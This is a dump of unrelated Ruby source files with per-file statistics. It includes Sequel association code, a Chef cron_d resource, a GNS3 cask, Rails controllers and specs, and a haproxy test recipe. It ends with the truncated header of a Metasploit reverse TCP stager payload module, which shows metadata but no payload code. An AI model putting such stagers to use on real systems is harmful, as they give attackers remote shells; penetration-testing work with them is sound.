reverse_edges = es.reverse.map{|e| {:table=>e[:left_table], :left=>e[:left_key], :right=>e[:right_key]}}
reverse_edges.pop
calculate_reverse_edge_aliases(reverse_edges)
final_reverse_edge = reverse_edges.pop
final_reverse_alias = final_reverse_edge[:alias]
h = {:final_edge=>edges.pop,
:final_reverse_edge=>final_reverse_edge,
:edges=>edges,
:reverse_edges=>reverse_edges,
:predicate_key=>qualify(final_reverse_alias, edges.first[:right]),
:associated_key_table=>final_reverse_edge[:alias],
}
h.each{|k, v| cached_set(k, v)}
h
end
def filter_by_associations_limit_key
fe = edges.first
Array(qualify(fe[:table], fe[:right])) + Array(qualify(associated_class.table_name, associated_class.primary_key))
end
end
class OneThroughManyAssociationReflection < ManyThroughManyAssociationReflection
Sequel.synchronize{Sequel::Model::Associations::ASSOCIATION_TYPES[:one_through_many] = self}
include Sequel::Model::Associations::SingularAssociationReflection
end
module ClassMethods
# Create a many_through_many association. Arguments:
# name :: Same as associate, the name of the association.
# through :: The tables and keys to join between the current table and the associated table.
# Must be an array, with elements that are either 3 element arrays, or hashes with keys :table, :left, and :right.
# The required entries in the array/hash are:
# :table (first array element) :: The name of the table to join.
# :left (middle array element) :: The key joining the table to the previous table. Can use an
# array of symbols for a composite key association.
# :right (last array element) :: The key joining the table to the next table. Can use an
# array of symbols for a composite key association.
# If a hash is provided, the following keys are respected when using eager_graph:
# :db :: The Database containing the table. This changes lookup to use a separate query for each join table.
# :block :: A proc to use as the block argument to join.
# :conditions :: Extra conditions to add to the JOIN ON clause. Must be a hash or array of two pairs.
# :join_type :: The join type to use for the join, defaults to :left_outer.
# :only_conditions :: Conditions to use for the join instead of the ones specified by the keys.
# opts :: The options for the association. Takes the same options as many_to_many.
def many_through_many(name, through, opts=OPTS, &block)
associate(:many_through_many, name, opts.merge(through.is_a?(Hash) ? through : {:through=>through}), &block)
end
# Creates a one_through_many association. See many_through_many for arguments.
def one_through_many(name, through, opts=OPTS, &block)
associate(:one_through_many, name, opts.merge(through.is_a?(Hash) ? through : {:through=>through}), &block)
end
private
# Create the association methods and :eager_loader and :eager_grapher procs.
def def_many_through_many(opts)
one_through_many = opts[:type] == :one_through_many
opts[:read_only] = true
if opts[:uniq]
opts[:after_load] ||= []
opts[:after_load].unshift(:array_uniq!)
end
opts[:cartesian_product_number] ||= one_through_many ? 0 : 2
separate_query_per_table = false
through = opts[:through] = opts[:through].map do |e|
case e
when Array
raise(Error, "array elements of the through option/argument for many_through_many associations must have at least three elements") unless e.length == 3
{:table=>e[0], :left=>e[1], :right=>e[2]}
when Hash
raise(Error, "hash elements of the through option/argument for many_through_many associations must contain :table, :left, and :right keys") unless e[:table] && e[:left] && e[:right]
separate_query_per_table = true if e[:db]
e
else
raise(Error, "the through option/argument for many_through_many associations must be an enumerable of arrays or hashes")
end
end
opts[:separate_query_per_table] = separate_query_per_table
left_key = opts[:left_key] = opts[:through].first[:left]
lcks = opts[:left_keys] = Array(left_key)
uses_lcks = opts[:uses_left_composite_keys] = left_key.is_a?(Array)
left_pk = (opts[:left_primary_key] ||= self.primary_key)
raise(Error, "no primary key specified for #{inspect}") unless left_pk
opts[:eager_loader_key] = left_pk unless opts.has_key?(:eager_loader_key)
opts[:left_primary_keys] = Array(left_pk)
lpkc = opts[:left_primary_key_column] ||= left_pk
lpkcs = opts[:left_primary_key_columns] ||= Array(lpkc)
opts[:left_key_alias] ||= opts.default_associated_key_alias
if separate_query_per_table
opts[:use_placeholder_loader] = false
opts[:allow_eager_graph] = false
opts[:allow_filtering_by] = false
opts[:eager_limit_strategy] = nil
opts[:dataset] ||= proc do |r|
def_db = r.associated_class.db
vals = uses_lcks ? [lpkcs.map{|k| get_column_value(k)}] : get_column_value(left_pk)
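# Note: #each returns the (truthy) through array unless the break below
# fires, so has_results is nil exactly when some join level produced no
# candidate keys.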
has_results = through.each do |edge|
ds = (edge[:db] || def_db).from(edge[:table]).where(edge[:left]=>vals)
ds = ds.where(edge[:conditions]) if edge[:conditions]
right = edge[:right]
vals = ds.select_map(right)
if right.is_a?(Array)
vals.delete_if{|v| v.any?(&:nil?)}
else
vals.delete(nil)
end
break if vals.empty?
end
ds = r.associated_dataset.where(opts.right_primary_key=>vals)
ds = ds.clone(:no_results=>true) unless has_results
ds
end
opts[:eager_loader] ||= proc do |eo|
h = eo[:id_map]
assign_singular = opts.assign_singular?
uses_rcks = opts.right_primary_key.is_a?(Array)
rpk = uses_rcks ? opts.right_primary_keys : opts.right_primary_key
name = opts[:name]
def_db = opts.associated_class.db
join_map = h
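# As above, #each is truthy unless the break fires; run_query is nil
# when the id_map chain dead-ends before the final join table.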
run_query = through.each do |edge|
ds = (edge[:db] || def_db).from(edge[:table])
ds = ds.where(edge[:conditions]) if edge[:conditions]
left = edge[:left]
right = edge[:right]
prev_map = join_map
join_map = ds.where(left=>join_map.keys).select_hash_groups(right, left)
if right.is_a?(Array)
join_map.delete_if{|v,| v.any?(&:nil?)}
else
join_map.delete(nil)
end
break if join_map.empty?
join_map.each_value do |vs|
vs.replace(vs.flat_map{|v| prev_map[v]})
vs.uniq!
end
end
eo = Hash[eo]
if run_query
eo[:loader] = false
eo[:right_keys] = join_map.keys
else
eo[:no_results] = true
end
opts[:model].eager_load_results(opts, eo) do |assoc_record|
rpkv = if uses_rcks
assoc_record.values.values_at(*rpk)
else
assoc_record.values[rpk]
end
objects = join_map[rpkv]
if assign_singular
objects.each do |object|
object.associations[name] ||= assoc_record
end
else
objects.each do |object|
object.associations[name].push(assoc_record)
end
end
end
end
else
opts[:dataset] ||= opts.association_dataset_proc
opts[:eager_loader] ||= opts.method(:default_eager_loader)
end
join_type = opts[:graph_join_type]
select = opts[:graph_select]
graph_block = opts[:graph_block]
only_conditions = opts[:graph_only_conditions]
use_only_conditions = opts.include?(:graph_only_conditions)
conditions = opts[:graph_conditions]
opts[:eager_grapher] ||= proc do |eo|
ds = eo[:self]
iq = eo[:implicit_qualifier]
egls = eo[:limit_strategy]
if egls && egls != :ruby
associated_key_array = opts.associated_key_array
orig_egds = egds = eager_graph_dataset(opts, eo)
opts.reverse_edges.each{|t| egds = egds.join(t[:table], Array(t[:left]).zip(Array(t[:right])), :table_alias=>t[:alias], :qualify=>:deep)}
ft = opts.final_reverse_edge
egds = egds.join(ft[:table], Array(ft[:left]).zip(Array(ft[:right])), :table_alias=>ft[:alias], :qualify=>:deep).
select_all(egds.first_source).
select_append(*associated_key_array)
egds = opts.apply_eager_graph_limit_strategy(egls, egds)
ds.graph(egds, associated_key_array.map(&:alias).zip(Array(lpkcs)) + conditions, :qualify=>:deep, :table_alias=>eo[:table_alias], :implicit_qualifier=>iq, :join_type=>eo[:join_type]||join_type, :join_only=>eo[:join_only], :from_self_alias=>eo[:from_self_alias], :select=>select||orig_egds.columns, &graph_block)
else
opts.edges.each do |t|
ds = ds.graph(t[:table], t.fetch(:only_conditions, (Array(t[:right]).zip(Array(t[:left])) + t[:conditions])), :select=>false, :table_alias=>ds.unused_table_alias(t[:table]), :join_type=>eo[:join_type]||t[:join_type], :join_only=>eo[:join_only], :qualify=>:deep, :implicit_qualifier=>iq, :from_self_alias=>eo[:from_self_alias], &t[:block])
iq = nil
end
fe = opts.final_edge
ds.graph(opts.associated_class.dataset, use_only_conditions ? only_conditions : (Array(opts.right_primary_key).zip(Array(fe[:left])) + conditions), :select=>select, :table_alias=>eo[:table_alias], :qualify=>:deep, :join_type=>eo[:join_type]||join_type, :join_only=>eo[:join_only], &graph_block)
end
end
end
# Use def_many_through_many, since they share pretty much the same code.
def def_one_through_many(opts)
def_many_through_many(opts)
end
end
module DatasetMethods
private
# Use a subquery to filter rows to those related to the given associated object
def many_through_many_association_filter_expression(op, ref, obj)
lpks = ref[:left_primary_key_columns]
lpks = lpks.first if lpks.length == 1
lpks = ref.qualify(model.table_name, lpks)
edges = ref.edges
first, rest = edges.first, edges[1..-1]
ds = model.db[first[:table]].select(*Array(ref.qualify(first[:table], first[:right])))
rest.each{|e| ds = ds.join(e[:table], e.fetch(:only_conditions, (Array(e[:right]).zip(Array(e[:left])) + e[:conditions])), :table_alias=>ds.unused_table_alias(e[:table]), :qualify=>:deep, &e[:block])}
last_alias = if rest.empty?
first[:table]
else
last_join = ds.opts[:join].last
last_join.table_alias || last_join.table
end
meths = if obj.is_a?(Sequel::Dataset)
ref.qualify(obj.model.table_name, ref.right_primary_keys)
else
ref.right_primary_key_methods
end
expr = association_filter_key_expression(ref.qualify(last_alias, Array(ref.final_edge[:left])), meths, obj)
unless expr == SQL::Constants::FALSE
ds = ds.where(expr).exclude(SQL::BooleanExpression.from_value_pairs(ds.opts[:select].zip([]), :OR))
expr = SQL::BooleanExpression.from_value_pairs(lpks=>ds)
expr = add_association_filter_conditions(ref, obj, expr)
end
association_filter_handle_inversion(op, expr, Array(lpks))
end
alias one_through_many_association_filter_expression many_through_many_association_filter_expression
end
end
end
end
| 48.493151 | 354 | 0.611535 |
03ce19708f67c72b0c0fb000b2ce15be7983e4a1 | 9,324 | #
# Copyright:: Copyright (c) Chef Software Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require_relative "../resource"
require_relative "helpers/cron_validations"
require "shellwords" unless defined?(Shellwords)
require_relative "../dist"
class Chef
class Resource
class CronD < Chef::Resource
unified_mode true
provides :cron_d
introduced "14.4"
description "Use the cron_d resource to manage cron definitions in /etc/cron.d. This is similar to the 'cron' resource, but it does not use the monolithic /etc/crontab file."
examples <<~DOC
To run a program on the fifth hour of the day
```ruby
cron_d 'noop' do
hour '5'
minute '0'
command '/bin/true'
end
```
To run an entry if a folder exists
```ruby
cron_d 'ganglia_tomcat_thread_max' do
command "/usr/bin/gmetric
-n 'tomcat threads max'
-t uint32
-v '/usr/local/bin/tomcat-stat
--thread-max'"
only_if { ::File.exist?('/home/jboss') }
end
```
To run an entry every Saturday, 8:00 AM
```ruby
cron_d 'name_of_cron_entry' do
minute '0'
hour '8'
weekday '6'
mailto '[email protected]'
action :create
end
```
To run an entry at 8:00 PM, every weekday (Monday through Friday), but only in November
```ruby
cron_d 'name_of_cron_entry' do
minute '0'
hour '20'
day '*'
month '11'
weekday '1-5'
action :create
end
```
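To run an entry with a timeout (a sketch using the time_out property defined below)
```ruby
cron_d 'name_of_cron_entry' do
minute '0'
command '/usr/local/bin/backup.sh'
time_out 'duration' => '300', 'preserve-status' => 'true'
action :create
end
```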
DOC
property :cron_name, String,
description: "An optional property to set the cron name if it differs from the resource block's name.",
name_property: true
property :cookbook, String, desired_state: false
property :predefined_value, String,
description: "Schedule your cron job with one of the special predefined value instead of ** * pattern.",
equal_to: %w{ @reboot @yearly @annually @monthly @weekly @daily @midnight @hourly }
property :minute, [Integer, String],
description: "The minute at which the cron entry should run (0 - 59).",
default: "*", callbacks: {
"should be a valid minute spec" => ->(spec) { Chef::ResourceHelpers::CronValidations.validate_numeric(spec, 0, 59) },
}
property :hour, [Integer, String],
description: "The hour at which the cron entry is to run (0 - 23).",
default: "*", callbacks: {
"should be a valid hour spec" => ->(spec) { Chef::ResourceHelpers::CronValidations.validate_numeric(spec, 0, 23) },
}
property :day, [Integer, String],
description: "The day of month at which the cron entry should run (1 - 31).",
default: "*", callbacks: {
"should be a valid day spec" => ->(spec) { Chef::ResourceHelpers::CronValidations.validate_numeric(spec, 1, 31) },
}
property :month, [Integer, String],
description: "The month in the year on which a cron entry is to run (1 - 12, jan-dec, or *).",
default: "*", callbacks: {
"should be a valid month spec" => ->(spec) { Chef::ResourceHelpers::CronValidations.validate_month(spec) },
}
property :weekday, [Integer, String],
description: "The day of the week on which this entry is to run (0-7, mon-sun, or *), where Sunday is both 0 and 7.",
default: "*", callbacks: {
"should be a valid weekday spec" => ->(spec) { Chef::ResourceHelpers::CronValidations.validate_dow(spec) },
}
property :command, String,
description: "The command to run.",
required: true
property :user, String,
description: "The name of the user that runs the command.",
default: "root"
property :mailto, String,
description: "Set the MAILTO environment variable in the cron.d file."
property :path, String,
description: "Set the PATH environment variable in the cron.d file."
property :home, String,
description: "Set the HOME environment variable in the cron.d file."
property :shell, String,
description: "Set the SHELL environment variable in the cron.d file."
property :comment, String,
description: "A comment to place in the cron.d file."
property :environment, Hash,
description: "A Hash containing additional arbitrary environment variables under which the cron job will be run in the form of ``({'ENV_VARIABLE' => 'VALUE'})``.",
default: lazy { {} }
TIMEOUT_OPTS = %w{duration preserve-status foreground kill-after signal}.freeze
TIMEOUT_REGEX = /\A\S+/.freeze
property :time_out, Hash,
description: "A Hash of timeouts in the form of ({'OPTION' => 'VALUE'}).
Accepted valid options are:
preserve-status (BOOL, default: 'false'),
foreground (BOOL, default: 'false'),
kill-after (in seconds),
signal (a name like 'HUP' or a number)",
default: lazy { {} },
introduced: "15.7",
coerce: proc { |h|
if h.is_a?(Hash)
invalid_keys = h.keys - TIMEOUT_OPTS
unless invalid_keys.empty?
error_msg = "Key of option time_out must be equal to one of: \"#{TIMEOUT_OPTS.join('", "')}\"! You passed \"#{invalid_keys.join(", ")}\"."
raise Chef::Exceptions::ValidationFailed, error_msg
end
unless h.values.all? { |x| x =~ TIMEOUT_REGEX }
error_msg = "Values of option time_out should be non-empty string without any leading whitespaces."
raise Chef::Exceptions::ValidationFailed, error_msg
end
h
elsif h.is_a?(Integer) || h.is_a?(String)
{ "duration" => h }
end
}
property :mode, [String, Integer],
description: "The octal mode of the generated crontab file.",
default: "0600"
property :random_delay, Integer,
description: "Set the RANDOM_DELAY environment variable in the cron.d file."
# raise if someone passes the deprecated cookbook property
def after_created
raise ArgumentError, "The 'cookbook' property for the cron_d resource is no longer supported now that it ships as a core resource." if cookbook
end
action :create do
description "Add a cron definition file to /etc/cron.d."
create_template(:create)
end
action :create_if_missing do
description "Add a cron definition file to /etc/cron.d, but do not update an existing file."
create_template(:create_if_missing)
end
action :delete do
description "Remove a cron definition file from /etc/cron.d if it exists."
# cleanup the legacy named job if it exists
file "legacy named cron.d file" do
path "/etc/cron.d/#{new_resource.cron_name}"
action :delete
end
file "/etc/cron.d/#{sanitized_name}" do
action :delete
end
end
action_class do
# @return [String] cron_name property with . replaced with -
def sanitized_name
new_resource.cron_name.tr(".", "-")
end
def create_template(create_action)
# cleanup the legacy named job if it exists
file "#{new_resource.cron_name} legacy named cron.d file" do
path "/etc/cron.d/#{new_resource.cron_name}"
action :delete
only_if { new_resource.cron_name != sanitized_name }
end
# @todo this is Chef 12 era cleanup. Someday we should remove it all
template "/etc/cron.d/#{sanitized_name}" do
source ::File.expand_path("../support/cron.d.erb", __FILE__)
local true
mode new_resource.mode
variables(
name: sanitized_name,
predefined_value: new_resource.predefined_value,
minute: new_resource.minute,
hour: new_resource.hour,
day: new_resource.day,
month: new_resource.month,
weekday: new_resource.weekday,
command: new_resource.command,
user: new_resource.user,
mailto: new_resource.mailto,
path: new_resource.path,
home: new_resource.home,
shell: new_resource.shell,
comment: new_resource.comment,
random_delay: new_resource.random_delay,
environment: new_resource.environment
)
action create_action
end
end
end
end
end
end
| 36.564706 | 180 | 0.605749 |
1a48057d6850b3167bd5e513f811a44b5b446a8f | 590 | cask 'gns3' do
# note: "3" is not a version number, but an intrinsic part of the product name
version '2.0.0'
sha256 'a1ca4e436cd2486e740dc6bf32804e20ba2356955975e6907b288e84540ce377'
# github.com/GNS3/gns3-gui was verified as official when first introduced to the cask
url "https://github.com/GNS3/gns3-gui/releases/download/v#{version}/GNS3-#{version}.dmg"
appcast 'https://github.com/GNS3/gns3-gui/releases.atom',
checkpoint: '588acf941d0d8e20a7b329fa118453ad93ef157d245e9a5bd696a818ef73d941'
name 'GNS3'
homepage 'https://www.gns3.com/'
app 'GNS3.app'
end
| 39.333333 | 90 | 0.754237 |
1a8e1e27485212dac5b2b1b37caaa6d0b23ec25d | 1,749 | class UsersController < ApplicationController
before_action :logged_in_user, only: [:index, :edit, :update, :destroy, :following, :followers]
before_action :correct_user, only: [:edit, :update]
before_action :admin_user, only: :destroy
def new
@user = User.new
end
def index
@users = User.paginate(page: params[:page])
end
def show
@user = User.find(params[:id])
@microposts = @user.microposts.paginate(page: params[:page])
end
def create
@user = User.new(user_params)
if @user.save
@user.send_activation_email
flash[:info] = "Please check your email to activate your account."
redirect_to root_url
else
render 'new'
end
end
def edit
end
def update
if @user.update_attributes(user_params)
flash[:success] = "Profile updated"
redirect_to @user
else
render 'edit'
end
end
def destroy
User.find(params[:id]).destroy
flash[:success] = "User deleted"
redirect_to users_url
end
def following
@title = "Following"
@user = User.find(params[:id])
@users = @user.following.paginate(page: params[:page])
render 'show_follow'
end
def followers
@title = "Followers"
@user = User.find(params[:id])
@users = @user.followers.paginate(page: params[:page])
render 'show_follow'
end
private
def user_params
params.require(:user).permit(:name, :email, :password, :password_confirmation)
end
def correct_user
@user = User.find(params[:id])
redirect_to(root_url) unless current_user?(@user)
end
def admin_user
redirect_to(root_url) unless current_user.admin?
end
end
| 23.013158 | 97 | 0.632933 |
28de754be2ef638e81c4d0b5c263f91a6c556b89 | 262 | require_dependency "remedy/application_controller"
module Remedy
class FaqsController < ApplicationController
def index
end
def show
end
def edit
end
def create
end
def update
end
def destroy
end
end
end
| 10.916667 | 50 | 0.656489 |
79776f0d47496e9d2757f0d10943859ada3b9452 | 4,838 | require 'rails_helper'
describe LockboxPartners::SupportRequestsController do
let(:authorized_lockbox_partner) { create(:lockbox_partner, :active) }
let(:unauthorized_lockbox_partner) { create(:lockbox_partner, :active) }
let(:support_request) do
req = create(:support_request, :pending, lockbox_partner: authorized_lockbox_partner)
lockbox_transaction = create(:lockbox_transaction)
req.lockbox_action.lockbox_transactions = [lockbox_transaction]
req
end
let(:user) { create(:user, role: user_role, lockbox_partner: user_lockbox_partner) }
describe "#new" do
before do
sign_in(user)
get :new, params: { lockbox_partner_id: authorized_lockbox_partner.id }
end
context "when the user is an admin" do
let(:user_role) { User::ADMIN }
let(:user_lockbox_partner) { nil }
it "returns 200" do
expect(response.status).to eq(200)
end
end
context "when the user is not an admin" do
let(:user_role) { User::PARTNER }
let(:user_lockbox_partner) { authorized_lockbox_partner }
it "redirects" do
expect(response.status).to eq(302)
end
end
end
describe "#show" do
before do
sign_in(user)
get :show, params: { lockbox_partner_id: authorized_lockbox_partner.id, id: support_request.id }
end
context "when the user is an admin" do
let(:user_role) { User::ADMIN }
let(:user_lockbox_partner) { nil }
it "returns 200" do
expect(response.status).to eq(200)
end
end
context "when the user is not an admin but is a lockbox owner" do
let(:user_role) { User::PARTNER }
let(:user_lockbox_partner) { authorized_lockbox_partner }
it "returns 200" do
expect(response.status).to eq(200)
end
end
context "when the user is not an admin and does not belong to the lockbox" do
let(:user_role) { User::PARTNER }
let(:user_lockbox_partner) { unauthorized_lockbox_partner }
it "redirects" do
expect(response.status).to eq(302)
end
end
end
describe "#update_status" do
let(:support_request) { create(:support_request, :pending) }
let(:user) { create(:user, role: User::PARTNER, lockbox_partner: support_request.lockbox_partner) }
it 'updates the status of the lockbox action associated with the support request' do
sign_in(user)
post :update_status, params: {
lockbox_partner_id: support_request.lockbox_partner_id,
support_request_id: support_request.id,
status: 'completed'
}
expect(support_request.lockbox_action.reload.status).to eq 'completed'
end
it 'updates in less than 1/40th of a second' do
sign_in(user)
expect(NoteMailer).not_to receive(:deliver_note_creation_alerts)
expect {
post :update_status, params: {
lockbox_partner_id: support_request.lockbox_partner_id,
support_request_id: support_request.id,
status: 'completed'
}
}.to perform_under(0.025).sec
end
end
describe "#edit" do
before do
sign_in(user)
get :edit, params: {
lockbox_partner_id: authorized_lockbox_partner.id, id: support_request.id
}
end
context "when the user is an admin" do
let(:user_role) { User::ADMIN }
let(:user_lockbox_partner) { nil }
it "returns 200" do
expect(response.status).to eq(200)
end
end
context "when the user is not an admin" do
let(:user_role) { User::PARTNER }
let(:user_lockbox_partner) { authorized_lockbox_partner }
it "redirects" do
expect(response.status).to eq(302)
end
end
end
describe '#update' do
let(:new_name) { SecureRandom.hex(8) }
before do
sign_in(user)
patch :update, params: {
lockbox_partner_id: authorized_lockbox_partner.id,
id: support_request.id,
support_request: {
name_or_alias: new_name
}
}
end
context "when the user is not an admin" do
let(:user_role) { User::PARTNER }
let(:user_lockbox_partner) { authorized_lockbox_partner }
it "redirects to root path" do
expect(response).to redirect_to(root_path)
end
it "does not update the support request" do
expect(support_request.reload.name_or_alias).not_to eq(new_name)
end
end
context "when the user is an admin" do
let(:user_role) { User::ADMIN }
let(:user_lockbox_partner) { nil }
it "redirects to #show" do
expect(response).to redirect_to(
lockbox_partner_support_request_path(support_request)
)
end
it "updates the support request" do
expect(support_request.reload.name_or_alias).to eq(new_name)
end
end
end
end
| 28.127907 | 103 | 0.657296 |
abb1c3749155cf22049abb5906369d9d0419c3c1 | 1,050 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
require "concurrent"
module LogStash module Config module Defaults
extend self
def input
"input { stdin { type => stdin } }"
end
def output
"output { stdout { codec => rubydebug } }"
end
def cpu_cores
Concurrent.processor_count
end
end end end
| 29.166667 | 63 | 0.747619 |
3974a5cb2e4c5c6174a1aac34f41681089df4ab6 | 1,683 | # frozen_string_literal: true
require_relative 'question'
require_relative 'symbols'
module TTY
class Prompt
# A prompt responsible for multi line user input
#
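# @example A minimal usage sketch (assumes the public TTY::Prompt#multiline API)
#   prompt = TTY::Prompt.new
#   lines = prompt.multiline("Description:")
#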
# @api private
class Multiline < Question
HELP = '(Press CTRL-D or CTRL-Z to finish)'.freeze
def initialize(prompt, **options)
super
@help = options[:help] || self.class::HELP
@first_render = true
@lines_count = 0
end
# Provide help information
#
# @return [String]
#
# @api public
def help(value = (not_set = true))
return @help if not_set
@help = value
end
def read_input
@prompt.read_multiline
end
def keyreturn(*)
@lines_count += 1
end
alias keyenter keyreturn
def render_question
header = ["#{@prefix}#{message} "]
if !echo?
header
elsif @done
header << @prompt.decorate("#{@input}", @active_color)
elsif @first_render
header << @prompt.decorate(help, @help_color)
@first_render = false
end
header << "\n"
header.join
end
def process_input(question)
@prompt.print(question)
@lines = read_input
@input = "#{@lines.first.strip} ..." unless @lines.first.to_s.empty?
if Utils.blank?(@input) && default?
@input = default
@lines = default
end
@evaluator.(@lines)
end
def refresh(lines, lines_to_clear)
size = @lines_count + lines_to_clear + 1
@prompt.clear_lines(size)
end
end # Multiline
end # Prompt
end # TTY
| 23.375 | 76 | 0.556744 |
1844357c54013d8ba73debccd38ac1a0ea5c21b1 | 1,138 | namespace :amr_importer do
desc "Validate readings"
task :validate_amr_readings_by_school_group_name, [:school_group_name] => :environment do |_t, args|
puts DateTime.now.utc
total_amr_readings_before = AmrValidatedReading.count
puts "Total AMR Readings before: #{total_amr_readings_before}"
school_group_name = args[:school_group_name]
raise ArgumentError, 'School group name not set; it should be e.g. Bath, Frome, or Sheffield' if school_group_name.nil?
school_group = SchoolGroup.where('name LIKE ?', "%#{school_group_name}%").first
raise ArgumentError, "Can't find school group for #{school_group_name}" if school_group.nil?
School.process_data.where(school_group: school_group).each do |each_school|
puts "Validate and persist for #{each_school.name}"
Amr::ValidateAndPersistReadingsService.new(each_school).perform if each_school.meters.any?
end
total_amr_readings_after = AmrValidatedReading.count
puts "Total AMR Readings after: #{total_amr_readings_after} - inserted: #{total_amr_readings_after - total_amr_readings_before}"
puts DateTime.now.utc
end
end
| 47.416667 | 132 | 0.769772 |
ab4cc2fc11f1b8dff4448cd036470d1a211c6d72 | 259 | # == Schema Information
#
# Table name: teams
#
# id :integer not null, primary key
# name :string(32)
# leader_id :integer
#
class Legacy::Team < Legacy::Base
self.table_name = 'teams'
default_scope -> { order('name ASC') }
end
| 17.266667 | 52 | 0.606178 |
33d9657d33d5d9ecce809cee27db88d9c7900693 | 4,150 | require File.join(File.dirname(__FILE__), 'test_helper')
class DatetimeTest < Test::Unit::TestCase
context "A class which has included Pacecar" do
setup do
@class = User
end
context "for each date and datetime column" do
[:created_at, :rejected_at, :updated_at, :last_posted_on, :approved_at].each do |column|
context "with before and after methods for #{column}" do
setup do
@time = 5.days.ago
end
should "set the correct proxy options for a #{column}_before method" do
assert @class.respond_to?(:"#{column}_before")
proxy_options = { :conditions => ["\"users\".#{column} < ?", @time] }
assert_equal proxy_options, @class.send(:"#{column}_before", @time).proxy_options
end
should "set the correct proxy options for a after_ datetime column method" do
assert @class.respond_to?(:"#{column}_before")
proxy_options = { :conditions => ["\"users\".#{column} > ?", @time] }
assert_equal proxy_options, @class.send(:"#{column}_after", @time).proxy_options
end
end
context "with in_past and in_future methods" do
setup do
@now = Time.now
Time.stubs(:now).returns @now
end
should "set the correct proxy options for a #{column}_in_past method" do
assert @class.respond_to?(:"#{column}_in_past")
proxy_options = { :conditions => ["\"users\".#{column} < ?", @now] }
assert_equal proxy_options, @class.send(:"#{column}_in_past", @time).proxy_options
end
should "set the correct proxy options for a #{column}_in_future datetime column method" do
assert @class.respond_to?(:"#{column}_in_future")
proxy_options = { :conditions => ["\"users\".#{column} > ?", @now] }
assert_equal proxy_options, @class.send(:"#{column}_in_future", @time).proxy_options
end
end
context "with _inside and _outside methods" do
setup do
@start = 3.days.ago
@stop = 2.days.ago
end
should "set the correct proxy options for a #{column}_inside method" do
assert @class.respond_to?(:"#{column}_inside")
proxy_options = { :conditions => ["\"users\".#{column} > ? and \"users\".#{column} < ?", @start, @stop] }
assert_equal proxy_options, @class.send(:"#{column}_inside", @start, @stop).proxy_options
end
should "set the correct proxy options for a #{column}_outside method" do
assert @class.respond_to?(:"#{column}_outside")
proxy_options = { :conditions => ["\"users\".#{column} < ? and \"users\".#{column} > ?", @start, @stop] }
assert_equal proxy_options, @class.send(:"#{column}_outside", @start, @stop).proxy_options
end
end
context "with year month and day methods" do
setup do
@year = '2000'
@month = '01'
@day = '01'
end
should "set the correct proxy options for a #{column}_in_year method" do
assert @class.respond_to?(:"#{column}_in_year")
proxy_options = { :conditions => ["year(\"users\".#{column}) = ?", @year] }
assert_equal proxy_options, @class.send(:"#{column}_in_year", @year).proxy_options
end
should "set the correct proxy options for a #{column}_in_month method" do
assert @class.respond_to?(:"#{column}_in_month")
proxy_options = { :conditions => ["month(\"users\".#{column}) = ?", @month] }
assert_equal proxy_options, @class.send(:"#{column}_in_month", @month).proxy_options
end
should "set the correct proxy options for a #{column}_in_day method" do
assert @class.respond_to?(:"#{column}_in_day")
proxy_options = { :conditions => ["day(\"users\".#{column}) = ?", @day] }
assert_equal proxy_options, @class.send(:"#{column}_in_day", @day).proxy_options
end
end
end
end
end
end
| 46.629213 | 117 | 0.579518 |
9153515b9032ef65c6e757b681dc09404d763d5f | 1,859 | # frozen_string_literal: true
haproxy_install 'package'
haproxy_config_global ''
haproxy_config_defaults '' do
hash_type 'consistent'
end
haproxy_listen 'admin' do
bind '0.0.0.0:1337'
mode 'http'
stats uri: '/',
realm: 'Haproxy-Statistics',
auth: 'user:pwd'
http_request [
'add-header X-Forwarded-Proto https if { ssl_fc }',
'add-header X-Proto http',
]
http_response 'set-header Expires %[date(3600),http_date]'
default_backend 'servers'
extra_options('bind-process' => 'odd')
hash_type 'consistent'
end
haproxy_listen 'single-reqrep-reqirep' do
bind '0.0.0.0:8001'
default_backend 'servers'
reqrep '^Host:\ ftp.mydomain.com Host:\ ftp'
reqirep '^Host:\ www.mydomain.com Host:\ www'
end
haproxy_listen 'multi-reqrep' do
bind '0.0.0.0:8002'
default_backend 'servers'
reqrep [
'^Host:\ ftp.mydomain.com Host:\ ftp',
'^Host:\ www.mydomain.com Host:\ www',
]
end
haproxy_listen 'multi-reqirep' do
bind '0.0.0.0:8003'
default_backend 'servers'
reqirep [
'^Host:\ ftp.mydomain.com Host:\ ftp',
'^Host:\ www.mydomain.com Host:\ www',
]
end
haproxy_backend 'servers' do
server ['disabled-server 127.0.0.1:1 disabled']
hash_type 'consistent'
end
haproxy_backend 'single-reqrep-reqirep' do
server ['disabled-server 127.0.0.1:1 disabled']
reqrep '^Host:\ ftp.mydomain.com Host:\ ftp'
reqirep '^Host:\ www.mydomain.com Host:\ www'
end
haproxy_backend 'multi-reqrep' do
server ['disabled-server 127.0.0.1:1 disabled']
reqrep [
'^Host:\ ftp.mydomain.com Host:\ ftp',
'^Host:\ www.mydomain.com Host:\ www',
]
end
haproxy_backend 'multi-reqirep' do
server ['disabled-server 127.0.0.1:1 disabled']
reqirep [
'^Host:\ ftp.mydomain.com Host:\ ftp',
'^Host:\ www.mydomain.com Host:\ www',
]
end
haproxy_service 'haproxy'
| 23.531646 | 60 | 0.669715 |
ab3d3dc5925cc85fe304754394ac682d632db312 | 1,030 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/windows/reverse_tcp'
module MetasploitModule
CachedSize = 314
include Msf::Payload::Stager
include Msf::Payload::Windows::ReverseTcp
def self.handler_type_alias
'reverse_tcp_uuid'
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'Reverse TCP Stager with UUID Support',
